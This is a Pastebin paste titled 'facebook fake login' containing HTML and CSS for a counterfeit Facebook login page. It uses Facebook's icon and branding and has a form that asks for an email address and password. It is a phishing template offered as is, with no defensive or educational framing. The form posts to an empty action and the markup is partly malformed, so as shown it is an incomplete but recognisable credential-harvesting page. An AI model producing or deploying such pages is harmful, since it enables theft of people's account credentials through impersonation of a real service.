Advertisement
AlexaMP

facebook fake login

Jan 24th, 2020
1,973
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 1.50 KB | None | 0 0
  1. <html>
  2.     <head>
  3.         <title>Facebook - Login</title>
  4.         <link rel='shortcut icon' href='https://www.facebook.com/images/fb_icon_325x325.png'>
  5.         <link href="https://fonts.googleapis.com/css?family=Roboto&display=swap" rel="stylesheet">
  6.         <style type='text/css'>
  7.         body{
  8.             margin:0;
  9.             color:#fff;
  10.             background:#336699;
  11.             text-align:center;
  12.             font-family: 'Roboto', sans-serif;
  13.         }
  14.         img{
  15.             width:70px;
  16.             margin-top:100px;
  17.         }
  18.         form{
  19.             margin:0 auto;
  20.             font-family: 'Roboto', sans-serif;
  21.         }
  22.         .form{
  23.             margin:0 auto;
  24.             max-width:400px;
  25.         }
  26.         .text{
  27.             width:100%;
  28.             background:#fff;
  29.             border:1px solid #fff;
  30.             padding:10px;
  31.             margin-top:5px;
  32.             margin-bottom:5px;
  33.             color:#000;
  34.         }
  35.         .text-alert{
  36.             width:100%;
  37.             background:#fff;
  38.             border:1px solid #FF2828;
  39.             padding:10px;
  40.             margin-top:5px;
  41.             margin-bottom:5px;
  42.             color:#000;
  43.         }
  44.         .submit{
  45.             width:100%;
  46.             background:#407BB6;
  47.             border:1px solid #407BB6;
  48.             padding:10px;
  49.             margin-top:20px;
  50.             margin-bottom:5px;
  51.             color:#fff;
  52.             text-align:center;
  53.         }
  54.         </style>
  55.         <body>
  56.             <img src='https://i0.wp.com/www.mollient.com/wp-content/uploads//2019/01/facebook-icon-white.png'>
  57.             <br/><br/><br/><br/><br/>
  58.             <div class='form'>
  59.                 <form method='post' action=''>
  60.                     <input class='text-alert' placeholder='Email address' name='email'>
  61.                     <input class='text' placeholder='Password' name='password'>
  62.                     <input class='submit' value='Log In'>
  63.                 </form>
  64.             </div>
  65.         </body>
  66.     </head>
  67. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement